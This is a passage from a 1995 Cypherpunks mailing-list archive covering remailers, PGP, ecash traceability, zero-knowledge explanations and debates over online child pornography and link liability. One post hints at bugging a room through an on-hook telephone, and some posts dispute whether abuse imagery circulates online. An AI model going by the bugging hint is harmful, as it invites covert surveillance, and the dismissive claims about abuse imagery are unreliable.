it if it's not used for a while'. Unfortunately, PGP Tools (or at least the version that I have) does not appear to work correctly on Linux. See the README file for information on compiling the code, and the user.doc file for user documentation (the little that currently exists). You should also ensure that you read the security concerns section in user.doc before using the program. Mark Grant (mark at unicorn.com) -----BEGIN PGP SIGNATURE----- Version: 2.6 iQEVAgUBMFileFVvaTo9kEQVAQFU6ggAk9MWUkT3b6b6dGpzZSiCR/pGM6SMdXIP ZCcE546a65cOl3esgdVSSUlaw3SDGt1FxuHB/pzPqTJBqaZNsPoSrvZbPSz0Fcl7 GjuDCGFIm4vPYi8tgoTc2WPbj4E0w1O5+vZvZWwvm/TrzfYNeMnlI3wWb18U+TXF hj9tOKbd1rmzx3an/ZGgfFzwlKtidPbLhOPxxv7XWFkpZAXbKAesKPw85sNilxy4 NwerRu9OAXBVNHGgJfM6S6+qfYygCuzIodseMwpOU+7uL1MfvB6LFJ5WL3di3FdA Hnv2CKbqmEVWlFc1TIY0mK6Ze+U/uRlgbM04/GLk1X3qM8r4SQUqwg== =jd5V -----END PGP SIGNATURE----- From patrick at Verity.COM Thu Sep 14 15:08:17 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Thu, 14 Sep 95 15:08:17 PDT Subject: [NOISE] Alice's Remailer site Message-ID: <9509142204.AA22141@cantina.verity.com> > > And can you imagine FIFTY people a day? I said FIFTY people a day -- > loggin' in, sending mail through Alice's Remailer site and loggin' out? > And friends, they may think it's a MOVEMENT, and that's what it is: > > THE ALICE'S REMAILER SITE ANTI-E-MAIL-SNIFFING MOVEMENT!-- > > and all you gotta do to join is to flip the bird to those traffic-sniffin' > spooks out there -- With feelin' ... > > > -Tom Swiss / tms at tis.com > There sure are a lot of us old fogies around here:) Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From alano at teleport.com Thu Sep 14 15:15:16 1995 From: alano at teleport.com (Alan Olsen) Date: Thu, 14 Sep 95 15:15:16 PDT Subject: AOL Porno Message-ID: <199509142214.PAA07197@desiree.teleport.com> At 05:25 AM 9/14/95 -0400, you wrote: >Will the federal prosecutors and Fibbies on this list please >emphasize that the Internet was not involved in the AOL kiddie porn >case. The Internet has enough opportunities for bad publicity as >it is. I watched the local news coverage of that case. The report was given by an individual who has made that mistake before. (He hosts a "Town Hall" program that exploits various subjects of the day. He was corrected as to "AOL not being the Internet" during one of them. I know, I was the one who corrected him.) The coverage showed lots of shots of the various internet binaries echos (including alt.binaries.pictures.erotica.children, but not alt.binaries.pictures.cops.), the web including the Penthouse site (as if Penthouse has kiddy porn), and other unrelated and non-AOL pictures. The Internet has become the new scapegoat of choice. The general media cannot (or is unwilling) to distinguish the difference between electronic nets. The Internet is a generic term for them and since when is the media willing to look beyond the surface? How does this connect to crypto? Well, aiding and abetting in a scapegoat is a capitol crime in this country. You can be assured that the Department of Scapegoat Management will link kiddy porn and crypto at some point in the minds of the generic public. Hopefully that perception can be "headed off at the pass". Having cryptography as a means of avoiding crime and criminals in the perception of the public is a good idea. The question is how to get that perception into the minds of the general public before the other meme can be inplanted by Scapegoat management and the other TLAa? >"Who wonders: How it is that CompuServe was able to exist from 1979 >to the arrival of Prodigy and AOL without major sex, and drugs, and >rock and roll problems?" I think the six-dot-three filenames has something to do with it... | Visualize whirled keys | alano at teleport.com | |"It's only half a keyserver. I had to split the | Disclaimer: | |other half with the government man." - Black Art | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From liberty at gate.net Thu Sep 14 15:57:37 1995 From: liberty at gate.net (Jim Ray) Date: Thu, 14 Sep 95 15:57:37 PDT Subject: cryptography eliminates lawyers? Message-ID: <199509142253.SAA63671@tequesta.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Brian Davis wrote: >Just wondering about liability issues after state accrediting is dead. Despite loud squawking, "chaos" will not ensue. Instead, the private sector will take over assesing risk, which it has always done better. An example: I'd rather jump into a full bathtub with a plugged-in, UL [Underwriter's Laboratories] certified TV set than take the FDA approved (but very dangerous, IMO) prostate drug called "Proscar." While there is only one UL (by choice, not force) and only one FDA (by force, not choice) I can easily imagine a lawyer-certifying companies like UL for appliances, probably tied [like UL] to the insurance industry. [I am not a lawyer, or a doctor either.] JMR -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh iQCVAwUBMFiyw21lp8bpvW01AQGWmQP/QrIwiASIcwWZ6T6mcg7lB+BknBzlgBjy IXMdTalqk5gepHhO386QiA4XNdhlBtaJWpOCQkqRu4M7MrSlCZBuPTNgyu5DJRNS Ru7X/XVWzCKrODWGg8o45GblveNQker7XOJp6v5cmU5xyo2hZNvwZlPb4jq2fWou wW/Amy49BNA= =Nbil -----END PGP SIGNATURE----- Regards, Jim Ray "When making public-policy decisions for the government, I think one should ask oneself which technologies would best strengthen the hand of a police state. Then, do not allow the government to deploy those technologies." -- Phillip Zimmermann, talking to himself. (Congress sure-as-hell wasn't paying attention!) ----------------------------------------------------------------------- PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 James M. Ray ----------------------------------------------------------------------- Help Phil! email zldf at clark.net or see http://www.netresponse.com/zldf _______________________________________________________________________ From rsalz at osf.org Thu Sep 14 16:26:27 1995 From: rsalz at osf.org (Rich Salz) Date: Thu, 14 Sep 95 16:26:27 PDT Subject: NSA on GAK Message-ID: <9509142325.AA06863@sulphur.osf.org> >> Internet runs on software distributed over the Internet. This is more like an aphorism than a true statement. From fstuart at vetmed.auburn.edu Thu Sep 14 16:39:21 1995 From: fstuart at vetmed.auburn.edu (Frank Stuart) Date: Thu, 14 Sep 95 16:39:21 PDT Subject: Linking = Showing = Transferring? Message-ID: <199509142338.SAA10960@snoopy.vetmed.auburn.edu> [...] >Here's my question, and a thought to ponder: If it is/becomes illegal to >have links on a homepage to pornography because it is ruled as the same as >having the pornography there; then can you have links to pages with links >(the same as having it) to pornography? This repeats, so would it be legal >to links at all? [...] And then there's the problem of URLs not being static. What may be a perfectly innocuos link one day may turn into something not perceived as harmless the next. I seem to recall reading about a French site (Femmes Femmes Femmes) that offered pictures of nude females. When the traffic got too much for them, they jokingly changed the links to point to pictures at the Louvre. However, it could just as easily happen the other way. I also heard something about the ACM taking the position that a URL was not equivalent to the work itself, but I don't have a reference. Frank Stuart | (Admiral Grace) Hopper's Law: fstuart at vetmed.auburn.edu | It's easier to get forgiveness than permission. From dsmith at midwest.net Thu Sep 14 17:00:16 1995 From: dsmith at midwest.net (David E. Smith) Date: Thu, 14 Sep 95 17:00:16 PDT Subject: Message-ID: <199509150009.TAA09893@cdale1.midwest.net> -- [ From: David E. Smith * EMC.Ver #2.5.02 ] -- > /* SAFER SK-128 designed by James L. Massey who did not do this > conversion and is not responsible for any bugs in it. > > This a 'C' conversion of the reference Turbo Pascal implementation Does anyone out there have a pointer to the "Turbo Pascal implementation?" (Or the code itself?) Reply to me, not the list; there's quite enough spam as it is. -- David E. Smith, c/o Southeast Missouri State University 1210 Towers South, Cape Girardeau MO 63701-4745 (314)339-3814, dsmith at midwest.net, PGP ID 0x92732139 Opinions are mine (though I often claim demonic possession) http://www.midwest.net/scribers/dsmith/index.html From shamrock at netcom.com Thu Sep 14 17:09:16 1995 From: shamrock at netcom.com (Lucky Green) Date: Thu, 14 Sep 95 17:09:16 PDT Subject: DD, pedaphiles, and Terrorists, oh my Message-ID: <199509150006.UAA17827@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <9509141640.AA30602 at zorch.w3.org>, hallam at w3.org wrote: >We never used to see kiddie porn on the internet. The net would go balistic if a >picture of a teen age nude was posted. Recently there has been a flood of hard >core paedophile material. There has always been nude teens on the net. The kind of pictures the most casual observer can take at any Mediteranian beach at any given day in the Summer. There is no real kiddy porn readily available on the net. I looked long and hard. Its a red herring. ANYBODY on this list seen some real kiddy porn on the net? I am talking intercourse, etc., not scans of six year olds from the Sears catalog, or naked boys building sandcastles on the beach. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMFjDkioZzwIn1bdtAQEB0gF+M67Ih6WLAl8J9bxPZOBmyjxKsxUczpqv th5x7ZuILyuf/+bFTtcLKwbOnzZkIfpJ =pjLL -----END PGP SIGNATURE----- From dsc at swcp.com Thu Sep 14 17:09:33 1995 From: dsc at swcp.com (Dar Scott) Date: Thu, 14 Sep 95 17:09:33 PDT Subject: Linking = Showing = Transferring? Message-ID: Suppose we interpret Linking = Showing as For all web pages x and y, Showing(x) and Linkto(x,y) --> Showing(y) Meaning: In all cases, if a page is being shown and it links to another page, then the other page is being shown. With this kind of transitivity I would not be surprised if a third of the web sites are showing pornography. For example (made up titles!), Transitors --> Electronics Distributers --> Ray's TV --> Springfield Businesses --> Bob's Photography --> Plenty Pictures --> Photography Resources --> Asian, Female --> World Nudity --> John's Porno Shop. The poor guy trying to be helpful to those learning electronics now has a pornopage. Perhaps some kind of fuzzy logic could apply. If one believes in such a thing. I wonder if I have a pornopage. Dar =========================================================== Dar Scott Home phone: +1 505 299 9497 Dar Scott Consulting Voice: +1 505 299 5790 8637 Horacio Place NE Email: darscott at aol.com Albuquerque, NM 87111 dsc at swcp.com Fax: +1 505 898 6525 http://www.swcp.com/~correspo/DSC/DarScott.html =========================================================== From shamrock at netcom.com Thu Sep 14 17:13:32 1995 From: shamrock at netcom.com (Lucky Green) Date: Thu, 14 Sep 95 17:13:32 PDT Subject: Child Porn, Morphing, and Pointers Message-ID: <199509150010.UAA17856@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article , tcmay at got.net (Timothy C. May) wrote: >>If I'm reading this correctly, if I Photoshop a kids face onto the body >>of the latest Playboy centerfold, I'm in violation of this proposed law? > >I believe there have already been prosecutions along these lines. For >example, do you think a _comic book_ with child porn themes ("explicit" >art, situations) would not be prosecuted as child porn? > >I strongly suspect that a _painting_ of a 7-year-old girl engaged in a sex >act would result in a prosecution. Any cites? - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMFjEkSoZzwIn1bdtAQFO5gGAvKEwd8DuWbNAzMtkqQ4BCPrp5YAOWrcu eSooY922jvZlXV+PYFcamevbR3mZ4bYj =Jxeu -----END PGP SIGNATURE----- From carolann at censored.org Thu Sep 14 17:28:55 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Thu, 14 Sep 95 17:28:55 PDT Subject: Digital Fingerprinting Message-ID: <199509140335.UAA13203@usr3.primenet.com> >> Why do I feel like I'm sitting on the group W bench? > >I don't know, kid, what you in for? MacN I said, "Velveeta," and they all moved away. "And, using a PGP signed message, through a chained MIXMASTER remailer to help Phil Z.," and they all came back, and we was talking about packet-sniffing, reputation markets, key cracking, ITAR, IP spoofing, Diffee-Hellman session keys, RC4, MD5, and all those wonderful things right there on the group W bench... -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From jya at pipeline.com Thu Sep 14 17:47:42 1995 From: jya at pipeline.com (John Young) Date: Thu, 14 Sep 95 17:47:42 PDT Subject: Celco Sting Message-ID: <199509150047.UAA05488@pipe4.nyc.pipeline.com> There's more on the cell-phone sting reported in the NYT Tuesday at: URL: gopher://justice2.usdoj.gov/00/usao/new_jersey/nj62.txt [Snippet] Secret Service "Operation Cybersnare" Arrested late Friday were: "Chillin," "Led," "Alpha Bits," "Mmind," "Cellfone" and "Barcode." A computer "hacker" is an individual with expertise in gaining unauthorized entry into computer systems. From shamrock at netcom.com Thu Sep 14 17:50:12 1995 From: shamrock at netcom.com (Lucky Green) Date: Thu, 14 Sep 95 17:50:12 PDT Subject: Linking = Showing = Transferring? Message-ID: <199509150047.UAA18025@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article , joseph at genome.wi.mit.edu (Joseph Sokol-Margolis) wrote: >Here's my question, and a thought to ponder: If it is/becomes illegal to >have links on a homepage to pornography because it is ruled as the same as >having the pornography there; then can you have links to pages with links >(the same as having it) to pornography? This repeats, so would it be legal >to links at all? The answer is trivial. If it pisses of the fascists in power enough, you go to jail or get killed. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMFjNIyoZzwIn1bdtAQFtXQGAkgf19PR9xYU91knoFXfYCR5NaPyWCcPz BfpmmPksdMUFCk73R4rMJIc+LruHQGb9 =2aYL -----END PGP SIGNATURE----- From shamrock at netcom.com Thu Sep 14 17:57:32 1995 From: shamrock at netcom.com (Lucky Green) Date: Thu, 14 Sep 95 17:57:32 PDT Subject: GAK Message-ID: <199509150055.UAA18048@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <9509141935.AA09315 at argosy.MasPar.COM>, koontz at MasPar.COM (David G. Koontz) wrote: >While not every telephone, every telephone switch is required >to be tap capable - The Digital Telephony Act. Note there is >provision for the government to pay costs for Telcos to make >their phones tappable - as yet unfunded by Congress. Most telephones can be used to monitor conversations in the room they are installed in even while on-hook. No need to ever enter the premises. Just drive it with AC. Look at your basic telephone diagram and remember Xc=1/(omega*C) from your AC circuits class. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMFjO4yoZzwIn1bdtAQFmjwGAwMA+G0nO0m/lmYeqPJEsC5NJNLvS5cYk +cMaVSJb+Kwk6+uywu8v088Ih8Nz7uo9 =elV9 -----END PGP SIGNATURE----- From dsc at swcp.com Thu Sep 14 17:58:50 1995 From: dsc at swcp.com (Dar Scott) Date: Thu, 14 Sep 95 17:58:50 PDT Subject: Linking = Showing = Transferring? Message-ID: Whoops! I mentioned the "linking to a page that links to a page..." problem without noticing that Joseph Sokol-Margolis had already brought it up. Maybe pornography is not in the page (or resource) but in the browser. For example, I have a "pornography enabled" browser, because I can use it to access pornopages. What if I set up a browser for my child that saw a smaller view of the net that did not include pornopages. That browser would not be "pornography enabled". The limited view could be created from some combination of lists of OK sites & pages, lists of off-limits sites & pages, and certification requirements for those in between (virtual OK lists). I have seen the off-limits lists in association with some blocking products. Frank Stuart wrote, >And then there's the problem of URLs not being static. What may be a perfectly >innocuos link one day may turn into something not perceived as harmless the >next. The blocking (off-limits) lists are then always behind and flawed. Better OK lists might be created by the list publisher having contractual commitments from the site owner. A virtual OK list publisher would publish the key for verifying approved pages that have built-in certs. This would provide the better probability that the browser was not pornography enabled. A page would not show if it had been changed. A problem to be solved would be doing this with minimal psychological time costs to the user. Another is making sure that getting certs would not be such a pain that only a few sites would be on the virtual OK list. Of course, I would not want my kids under 10 to see certain ideological pages and there might not be a market to justify certs. I would have to make my own list or get a cheap blocking list or something from the major-group-with-same-ideological-bent-as-dar ftp site. Dar =========================================================== Dar Scott Home phone: +1 505 299 9497 Dar Scott Consulting Voice: +1 505 299 5790 8637 Horacio Place NE Email: darscott at aol.com Albuquerque, NM 87111 dsc at swcp.com Fax: +1 505 898 6525 http://www.swcp.com/~correspo/DSC/DarScott.html =========================================================== From m5 at dev.tivoli.com Thu Sep 14 18:05:25 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Thu, 14 Sep 95 18:05:25 PDT Subject: GAK In-Reply-To: <199509150055.UAA18048@book.hks.net> Message-ID: <9509150104.AA03601@alpha> Lucky Green writes: > Most telephones can be used to monitor conversations in the room they are > installed in even while on-hook. No need to ever enter the premises. Just > drive it with AC. Look at your basic telephone diagram and remember > Xc=1/(omega*C) from your AC circuits class. The phrase "most telephones" may have been accurate when it meant "500 sets", but now that people generally own electronic phones I wonder whether the lucky one's statement remains true. (It might; I'm an electronics ignoramus.) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From barrett at iafrica.com Thu Sep 14 19:00:27 1995 From: barrett at iafrica.com (Alan Barrett) Date: Thu, 14 Sep 95 19:00:27 PDT Subject: [NOISE] Re: Linking = Showing = Transferring? In-Reply-To: Message-ID: > I wonder if I have a pornopage. Of course you do (assuming the stupid transitive definition of a pornopage). Start at your home page http://www.swcp.com/~correspo/DSC/DarScott.html --> follow link to "National Instruments" in second paragraph http://www.natinst.com/ --> follow link to "Reference" a few lines form the bottom of the page http://www.natinst.com/links.htm --> "WWW Virtual Library" near the top of the page http://epims1.gsfc.nasa.gov/engineering/ee.html --> "WWW Virtual Library" right at the top of page http://www.w3.org/hypertext/DataSources/bySubject/Overview.html --> "Other virtual libraries" near the bottom of the (rather long) page http://www.w3.org/hypertext/DataSources/bySubject/Virtual_libraries/Overview.html --> "Yahoo - A Guide to WWW" http://www.yahoo.com/ --> "Entertainment" http://www.yahoo.com/text/Entertainment/ --> "Magazines" http://www.yahoo.com/text/Entertainment/Magazines/ --> "Sex" http://www.yahoo.com/text/Entertainment/Magazines/Sex/ --> you figure out the rest From rsalz at osf.org Thu Sep 14 19:02:46 1995 From: rsalz at osf.org (Rich Salz) Date: Thu, 14 Sep 95 19:02:46 PDT Subject: Celco Sting Message-ID: <9509150202.AA07087@sulphur.osf.org> > A computer "hacker" is an individual with expertise in gaining > unauthorized entry into computer systems. I heard the special agent in charge being interviewed on NPR this morning. He was very careful to distinguish between "classic hackers" who just poke around for their own edification, and those who are using networks to actively commit crimes. My paraphrase, but it was definitely a praiseworthy viewpoint. /r$ From rsalz at osf.org Thu Sep 14 19:07:17 1995 From: rsalz at osf.org (Rich Salz) Date: Thu, 14 Sep 95 19:07:17 PDT Subject: Linking = Showing = Transferring? Message-ID: <9509150206.AA07108@sulphur.osf.org> >Suppose we interpret Linking = Showing as > >For all web pages x and y, >Showing(x) and Linkto(x,y) --> Showing(y) Then we would be fools. No more so than buying a book means you have instant access to all resources mentioned as footnotes or in the bibliography. Put more simply, *you have to click on Y* so they're not the same. /r$ From tcmay at got.net Thu Sep 14 19:28:55 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 14 Sep 95 19:28:55 PDT Subject: Explaining Zero Knowledge to your children Message-ID: At 6:18 PM 9/14/95, Hadmut Danisch wrote: >There is a paper about explaining Zero Knowledge methods in simple >words. It's titled "Explainig Zero Knowledge Authentication to your >children" or something similar. It's said to be in the proceedings of >any conference. Does anybody know where to find it? Schneier describes the "cave" analogy in his book, on p. 85, and gives a reference: Quisquater, Guilou, Berson, "How to Explain Zero-Knowledge Protocols to your Children," Advances in Cryptology--CRYPTO '89 Proceedings. The paper is only a couple of pages long and would make a nice scan project for someone, as it has no equations. But Schneier is the easiest way to read up on it. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From starrd at iia2.org Thu Sep 14 19:29:27 1995 From: starrd at iia2.org (starrd) Date: Thu, 14 Sep 95 19:29:27 PDT Subject: Scientology and police visit XS4ALL Amsterdam In-Reply-To: <199509130156.LAA29400@molly.cs.monash.edu.au> Message-ID: On Wed, 13 Sep 1995, Jiri Baum wrote: > > I feel I should point out that you have no proof that the text you have > attributed to me was in fact posted by me, and in fact you have reason > to believe otherwise since I usually PGP-sign my entire post including > any signature. > Wasn't a flame my friend.....wasn't meant as one either. > Off topic, but I have been publicly accused so I feel I should publicly > respond in the same forum. > no problem :-^) ||||||||||||email address: starrd at iia2.org or starrd at cinenet.net||||||||||| | Creator of the original | Get paid to upload | | Patriot's Archives \ shareware to BBSes and | | ftp: iia.org /pub/users/patriot \_____ the Internet! | | ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\ Get file: | | For index of available files: descript.ion \ uploader.zip | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP 7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf 9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig= =0Tlq -----END PGP PUBLIC KEY BLOCK----- From bdavis at thepoint.net Thu Sep 14 19:52:46 1995 From: bdavis at thepoint.net (Brian Davis) Date: Thu, 14 Sep 95 19:52:46 PDT Subject: cryptography eliminates lawyers? In-Reply-To: <199509142253.SAA63671@tequesta.gate.net> Message-ID: On Thu, 14 Sep 1995, Jim Ray wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > Brian Davis wrote: > > > > >Just wondering about liability issues after state accrediting is dead. > > > > > > Despite loud squawking, "chaos" will not ensue. Instead, the private > sector will take over assesing risk, which it has always done better. > > An example: I'd rather jump into a full bathtub with a plugged-in, > UL [Underwriter's Laboratories] certified TV set than take the FDA > approved (but very dangerous, IMO) prostate drug called "Proscar." > While there is only one UL (by choice, not force) and only one FDA > (by force, not choice) I can easily imagine a lawyer-certifying > companies like UL for appliances, probably tied [like UL] to the > insurance industry. [I am not a lawyer, or a doctor either.] > JMR Last I checked, FDA, UL, or state bar association approval does not *require* you to take, use, or hire the approved drug, toaster or lawyer. Market forces are still at work, albeit in a filtered environment. Just a first cut. And even that can usually be gotten around. EBD From hallam at w3.org Thu Sep 14 20:11:58 1995 From: hallam at w3.org (hallam at w3.org) Date: Thu, 14 Sep 95 20:11:58 PDT Subject: Explaining Zero Knowledge to your children In-Reply-To: Message-ID: <9509150310.AA32542@zorch.w3.org> The cave analogy sucks. The way I tried to explain Zero Knowledge is this: Imagine that you have a duplicator device which you want to sell, you don't want to explain why it works to the buyer however since then they would just make their own (patents have been abolished by this time). You also don't want the buyer to be able to prove to anyone else that you have a duplicator. So what you do is you play the "what hand is it in game" and you do this with a 10$ bill provided by the buyer and who records its serial number. You hold the original article in one hand and the duplicate in the other. The buyer choses one hand, you show the article in that hand. The buyer knows you had a 50:50 chance of a lucky guess so you do it again, each time the probability of getting it right by a lucky guess halves. After 10 tries or so it is virtually certain that you were not faking. Any better ideas... Phill From hallam at w3.org Thu Sep 14 20:22:10 1995 From: hallam at w3.org (hallam at w3.org) Date: Thu, 14 Sep 95 20:22:10 PDT Subject: DD, pedaphiles, and Terrorists, oh my In-Reply-To: <199509150006.UAA17827@book.hks.net> Message-ID: <9509150321.AA28976@zorch.w3.org> >ANYBODY on this list seen some real kiddy porn on the net? I am talking >intercourse, etc., not scans of six year olds from the Sears catalog, or >naked boys building sandcastles on the beach. Yes, I was specificaly refering to hard core images depicting intercourse with minors, including very young children. This was injected into the USEnet over a period of about 3 months from a number of sites. I do not know if the persons arrested today are the alledged source. Phill From robo at c2.org Thu Sep 14 20:57:55 1995 From: robo at c2.org (ROBO Mixmaster Remailer) Date: Thu, 14 Sep 95 20:57:55 PDT Subject: Mixmaster status Message-ID: <199509150345.UAA16323@infinity.c2.org> Flame Remailer wrote: > Subject: Mixmaster status > > There has been an offer to purchase and commercially develop Mixmaster. > This will hasten the development of Mixmaster for other platforms (e.g. > Dos, Windows Macintosh), and bring significant improvements to the > interface, but I will not compromise on the level of security provided by > Mixmaster. Free client software will continue to be available. > > This could be the big breakthrough for remailers, finally thrusting them > out of the hobbyist's closet into the corporate world. > > I wonder. Where is the commercial market for remailers? Who has an > application for them except hobbyinst? Why would there be a commercial > incentive to run a mixmaster server, or even a client? > > Could this "offer" be a red herring? I wondered the same thing myself. It would certainly be a more cost-effective way for the NSA to compromise Mixmaster technology than by brute force. Consider this scenario ... Mixmaster get's bought by the Acme Crypto Company of Ft. Meade, MD. They "improve" it, and offer a new version. It's even FREE (for non-commerical use)! But their "improvements" make it incompatible with previous versions, and so you have to upgrade. The new "commercial" version comes with no SOURCE CODE, of course... From shamrock at netcom.com Thu Sep 14 21:25:35 1995 From: shamrock at netcom.com (Lucky Green) Date: Thu, 14 Sep 95 21:25:35 PDT Subject: [non-crypto] Any info on Motorola Digital cell phone? Message-ID: <199509150423.AAA19333@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Well, I finally broke down and bought a cell phone. Motorola Digital 52134 flip style. Would the (numerous) cell phone pros on this list please get in touch with me and teach me the things not mentioned in the manual? Thanks guys and gals, - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMFj/pyoZzwIn1bdtAQGVTAGAmjw4ryqx3SiaPyFscACXsgCfq7ATT5EZ 8URi+2KH2e5xSLeOgj0+R+Z6Bcvvxoas =zXFO -----END PGP SIGNATURE----- From hfinney at shell.portal.com Thu Sep 14 22:34:01 1995 From: hfinney at shell.portal.com (Hal) Date: Thu, 14 Sep 95 22:34:01 PDT Subject: Why ecash is traceable Message-ID: <199509150532.WAA08865@jobe.shell.portal.com> There has been considerable discussion on sci.crypt and on the cypherpunks list about the fact that currently proposed digital cash is "traceable", or to put it another way, that there is no payee anonymity. This is an annoying asymmetry, where the payor is protected more than the payee. But there is a fundamental reason for this, which I want to explain here. It is not just perversity on the part of digital cash designers. The problem is that there is a conflict between the desire for payee anonymity and the need to prevent double spending. And preventing double spending is far more important, since without that the cash would be worthless. Here is how the conflict occurs. Suppose Alice has a piece of digital cash which she wants to spend with Bob. She goes through some protocol and transfers data to him. Bob, then or later, sends some resulting data to the bank and gets his account credited. Now if Alice spent that same coin with Charlie, we need to have the bank find it out. When Charlie deposits his data with the bank, and the bank compares that with what Bob sent in, there must be a red flag that goes up. The fundamental requirement of preventing double spending implies that Bob's and Charlie's data, when sent to the bank, has some correlation which will identify the fact that they both come from the same coin. It doesn't matter exactly what the form of this data is, or how it has been blinded and stirred, but if double spending is to be detected there must be a correlation which the bank can see. But this correlation is what makes the coin traceable. Suppose Alice is paying a coin to Bob via an anonymous network, and she and the bank are going to try to figure out who he really is. She goes through the payment transaction, and Bob sends his resulting data to the bank. Before doing so, though, Alice simulates a payment of the same coin to Charlie. Charlie doesn't actually have to be involved, Alice can just go through what she would have done if she had spent the coin elsewhere. The result of this simulated payment has been shared with the bank. Now, when Bob deposits his data, the bank compares it with the data Alice sent, the result of her simulated spending of the same coin. By the argument presented above, Bob's deposit will be flagged. It will correlate with the data Alice sent in since this will be the equivalent of a double-spending. So when Bob makes the deposit he can be linked to the specific coin payment which Alice made, and his anonymity is lost. It would seem that any system which is capable of detecting double- spending just from the information which the payees send in to the bank would be vulnerable to this. Systems which use tamper-proof observer chips to prevent double spending beforehand can avoid it, but of course if someone breaks an observer the whole cash system might crash. In general it does not look like payee anonymity is possible without giving up other very important features. Hal Finney hfinney at shell.portal.com From tcmay at got.net Fri Sep 15 00:14:56 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 15 Sep 95 00:14:56 PDT Subject: Why ecash is traceable Message-ID: Hal, a very nice summary! I have some questions, though. At 5:32 AM 9/15/95, Hal wrote: >The problem is that there is a conflict between the desire for payee >anonymity and the need to prevent double spending. And preventing >double spending is far more important, since without that the cash would >be worthless. Here is how the conflict occurs. Agreed, any system which allows makes double spending possible results in a currency collapse as the currency becomes worthless. Chaum points out that there "is no digital coin," that is, that software (numbers) must by their nature be easily copyable. Thus, any system to prevent double (triple, quadruple, etc.) spending must take this into account. Why not "online clearing" as the preferred model, then? To use your example: >Suppose Alice has a piece of digital cash which she wants to spend with >Bob. She goes through some protocol and transfers data to him. Bob, >then or later, sends some resulting data to the bank and gets his >account credited. Now if Alice spent that same coin with Charlie, we >need to have the bank find it out. When Charlie deposits his data with >the bank, and the bank compares that with what Bob sent in, there must >be a red flag that goes up. With online clearing, Bob sends his data to the relevant bank, confirms that his account has been credited, and tells Alice that her "check has cleared," so to speak, and the transaction is 